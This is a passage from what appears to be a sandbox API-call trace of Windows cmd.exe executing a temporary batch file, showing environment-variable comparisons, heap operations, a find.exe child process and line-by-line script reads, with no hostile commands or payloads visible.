_String2="PATHEXT", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0177.603] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0177.603] GetProcessHeap () returned 0x19a8f1e0000 [0177.604] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efe50) returned 1 [0177.604] GetProcessHeap () returned 0x19a8f1e0000 [0177.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ec7c0 [0177.604] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.604] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\find.exe", lpCommandLine="find /i \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe8f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe8d8 | out: lpCommandLine="find /i \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\" ", lpProcessInformation=0x43f9efe8d8*(hProcess=0x90, hThread=0xac, dwProcessId=0x964, dwThreadId=0x768)) returned 1 [0177.613] CloseHandle (hObject=0xac) returned 1 [0177.613] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.613] GetProcessHeap () returned 0x19a8f1e0000 [0177.613] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0177.613] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.613] GetProcessHeap () returned 0x19a8f1e0000 [0177.613] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2069b0 [0177.613] memcpy (in: _Dst=0x19a8f2069b0, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f2069b0) returned 0x19a8f2069b0 [0177.613] FreeEnvironmentStringsA (penv="=") returned 1 [0177.613] GetProcessHeap () returned 0x19a8f1e0000 [0177.614] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0177.614] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0 | out: lpAttributeList=0x43f9efe9d0) [0177.614] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0177.614] _close (_FileHandle=3) returned 0 [0177.614] GetProcessHeap () returned 0x19a8f1e0000 [0177.614] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.615] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0177.615] _close (_FileHandle=4) returned 0 [0177.615] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0177.789] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x43f9efed58 | out: lpExitCode=0x43f9efed58*=0x0) returned 1 [0177.789] CloseHandle (hObject=0x98) returned 1 [0177.789] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0177.805] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x43f9efed58 | out: lpExitCode=0x43f9efed58*=0x1) returned 1 [0177.805] CloseHandle (hObject=0x90) returned 1 [0177.805] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.805] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.805] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.805] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.805] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.805] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.806] SetConsoleInputExeNameW () returned 0x1 [0177.806] GetConsoleOutputCP () returned 0x1b5 [0177.806] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.806] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.807] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.807] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.807] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.807] SetFilePointer (in: hFile=0x90, lDistanceToMove=5242, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0177.807] GetProcessHeap () returned 0x19a8f1e0000 [0177.807] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f10) returned 1 [0177.807] GetProcessHeap () returned 0x19a8f1e0000 [0177.808] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0177.808] GetProcessHeap () returned 0x19a8f1e0000 [0177.808] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb8f0) returned 1 [0177.808] GetProcessHeap () returned 0x19a8f1e0000 [0177.808] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200e40) returned 1 [0177.808] GetProcessHeap () returned 0x19a8f1e0000 [0177.809] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ead00) returned 1 [0177.809] GetProcessHeap () returned 0x19a8f1e0000 [0177.809] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d150) returned 1 [0177.809] GetProcessHeap () returned 0x19a8f1e0000 [0177.810] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1effd0) returned 1 [0177.810] GetProcessHeap () returned 0x19a8f1e0000 [0177.810] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eac60) returned 1 [0177.810] GetProcessHeap () returned 0x19a8f1e0000 [0177.810] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0370) returned 1 [0177.810] GetProcessHeap () returned 0x19a8f1e0000 [0177.810] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fbef0) returned 1 [0177.810] GetProcessHeap () returned 0x19a8f1e0000 [0177.811] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f211b80) returned 1 [0177.811] GetProcessHeap () returned 0x19a8f1e0000 [0177.811] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20db60) returned 1 [0177.811] GetProcessHeap () returned 0x19a8f1e0000 [0177.812] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0177.812] GetProcessHeap () returned 0x19a8f1e0000 [0177.812] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0177.812] GetProcessHeap () returned 0x19a8f1e0000 [0177.812] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9130) returned 1 [0177.812] GetProcessHeap () returned 0x19a8f1e0000 [0177.813] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0177.813] GetProcessHeap () returned 0x19a8f1e0000 [0177.813] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffa90) returned 1 [0177.813] GetProcessHeap () returned 0x19a8f1e0000 [0177.813] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0177.814] GetProcessHeap () returned 0x19a8f1e0000 [0177.814] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efc40) returned 1 [0177.814] GetProcessHeap () returned 0x19a8f1e0000 [0177.814] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff250) returned 1 [0177.814] GetProcessHeap () returned 0x19a8f1e0000 [0177.815] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.815] GetProcessHeap () returned 0x19a8f1e0000 [0177.815] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f95e0) returned 1 [0177.815] GetProcessHeap () returned 0x19a8f1e0000 [0177.816] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff40) returned 1 [0177.816] GetProcessHeap () returned 0x19a8f1e0000 [0177.816] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efeb0) returned 1 [0177.816] GetProcessHeap () returned 0x19a8f1e0000 [0177.817] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe350) returned 1 [0177.817] GetProcessHeap () returned 0x19a8f1e0000 [0177.817] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fea10) returned 1 [0177.817] GetProcessHeap () returned 0x19a8f1e0000 [0177.818] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c90) returned 1 [0177.819] GetProcessHeap () returned 0x19a8f1e0000 [0177.819] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f02a0) returned 1 [0177.819] GetProcessHeap () returned 0x19a8f1e0000 [0177.819] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fead0) returned 1 [0177.819] GetProcessHeap () returned 0x19a8f1e0000 [0177.819] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1feb90) returned 1 [0177.819] GetProcessHeap () returned 0x19a8f1e0000 [0177.819] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efe20) returned 1 [0177.819] GetProcessHeap () returned 0x19a8f1e0000 [0177.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff6d0) returned 1 [0177.820] GetProcessHeap () returned 0x19a8f1e0000 [0177.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0177.820] GetProcessHeap () returned 0x19a8f1e0000 [0177.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0177.821] GetProcessHeap () returned 0x19a8f1e0000 [0177.821] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0177.821] GetProcessHeap () returned 0x19a8f1e0000 [0177.821] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.821] GetProcessHeap () returned 0x19a8f1e0000 [0177.821] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0177.821] GetProcessHeap () returned 0x19a8f1e0000 [0177.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.822] GetProcessHeap () returned 0x19a8f1e0000 [0177.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0177.822] GetProcessHeap () returned 0x19a8f1e0000 [0177.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0177.822] GetProcessHeap () returned 0x19a8f1e0000 [0177.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0177.822] GetProcessHeap () returned 0x19a8f1e0000 [0177.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0177.823] GetProcessHeap () returned 0x19a8f1e0000 [0177.823] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0177.823] GetProcessHeap () returned 0x19a8f1e0000 [0177.823] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0177.823] GetProcessHeap () returned 0x19a8f1e0000 [0177.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0177.824] GetProcessHeap () returned 0x19a8f1e0000 [0177.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0177.824] GetProcessHeap () returned 0x19a8f1e0000 [0177.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0177.824] GetProcessHeap () returned 0x19a8f1e0000 [0177.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0177.824] GetProcessHeap () returned 0x19a8f1e0000 [0177.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb00) returned 1 [0177.824] GetProcessHeap () returned 0x19a8f1e0000 [0177.825] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0177.825] GetProcessHeap () returned 0x19a8f1e0000 [0177.825] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0177.825] GetProcessHeap () returned 0x19a8f1e0000 [0177.825] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0177.825] GetProcessHeap () returned 0x19a8f1e0000 [0177.826] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.826] GetProcessHeap () returned 0x19a8f1e0000 [0177.826] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.826] GetProcessHeap () returned 0x19a8f1e0000 [0177.826] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0177.826] GetProcessHeap () returned 0x19a8f1e0000 [0177.827] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0177.827] GetProcessHeap () returned 0x19a8f1e0000 [0177.827] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecda0) returned 1 [0177.827] GetProcessHeap () returned 0x19a8f1e0000 [0177.827] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0177.827] GetProcessHeap () returned 0x19a8f1e0000 [0177.827] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0177.827] GetProcessHeap () returned 0x19a8f1e0000 [0177.827] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eccc0) returned 1 [0177.827] GetProcessHeap () returned 0x19a8f1e0000 [0177.828] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0177.828] GetProcessHeap () returned 0x19a8f1e0000 [0177.828] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0177.828] GetProcessHeap () returned 0x19a8f1e0000 [0177.828] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0177.828] GetProcessHeap () returned 0x19a8f1e0000 [0177.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0930) returned 1 [0177.829] GetProcessHeap () returned 0x19a8f1e0000 [0177.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca60) returned 1 [0177.829] GetProcessHeap () returned 0x19a8f1e0000 [0177.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a30) returned 1 [0177.829] GetProcessHeap () returned 0x19a8f1e0000 [0177.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ab0) returned 1 [0177.829] GetProcessHeap () returned 0x19a8f1e0000 [0177.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0177.829] GetProcessHeap () returned 0x19a8f1e0000 [0177.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0177.830] GetProcessHeap () returned 0x19a8f1e0000 [0177.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0177.830] GetProcessHeap () returned 0x19a8f1e0000 [0177.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.830] GetProcessHeap () returned 0x19a8f1e0000 [0177.831] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0177.831] GetProcessHeap () returned 0x19a8f1e0000 [0177.831] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0177.831] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.831] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0177.831] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.832] SetFilePointer (in: hFile=0x90, lDistanceToMove=5244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0177.832] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\no MASend\r\nthe archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 2 [0177.832] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.832] GetFileType (hFile=0x90) returned 0x1 [0177.832] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.832] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0177.832] GetProcessHeap () returned 0x19a8f1e0000 [0177.832] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.832] GetProcessHeap () returned 0x19a8f1e0000 [0177.832] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.832] _tell (_FileHandle=3) returned 5244 [0177.833] _close (_FileHandle=3) returned 0 [0177.833] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.834] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.834] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.834] SetFilePointer (in: hFile=0x90, lDistanceToMove=5244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0177.834] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.834] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0177.834] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.834] SetFilePointer (in: hFile=0x90, lDistanceToMove=5384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0177.834] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0177.834] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.834] GetFileType (hFile=0x90) returned 0x1 [0177.834] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.835] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0177.835] GetProcessHeap () returned 0x19a8f1e0000 [0177.835] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.835] GetProcessHeap () returned 0x19a8f1e0000 [0177.835] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.835] _tell (_FileHandle=3) returned 5384 [0177.835] _close (_FileHandle=3) returned 0 [0177.836] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.836] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.836] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.836] SetFilePointer (in: hFile=0x90, lDistanceToMove=5384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0177.836] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.836] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0177.836] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.836] SetFilePointer (in: hFile=0x90, lDistanceToMove=5386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0177.836] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0177.836] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.836] GetFileType (hFile=0x90) returned 0x1 [0177.836] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.837] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0177.837] GetProcessHeap () returned 0x19a8f1e0000 [0177.837] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.837] GetProcessHeap () returned 0x19a8f1e0000 [0177.837] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.838] _tell (_FileHandle=3) returned 5386 [0177.838] _close (_FileHandle=3) returned 0 [0177.838] CreateFileW 